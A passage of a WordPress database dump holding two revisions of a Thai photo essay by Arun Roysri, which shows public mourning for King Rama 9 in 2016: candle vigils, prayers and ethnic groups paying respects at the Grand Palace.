และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:39:16', '2018-11-12 07:39:16', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4395, 3, '2018-11-12 14:42:27', '2018-11-12 07:42:27', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:42:27', '2018-11-12 07:42:27', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
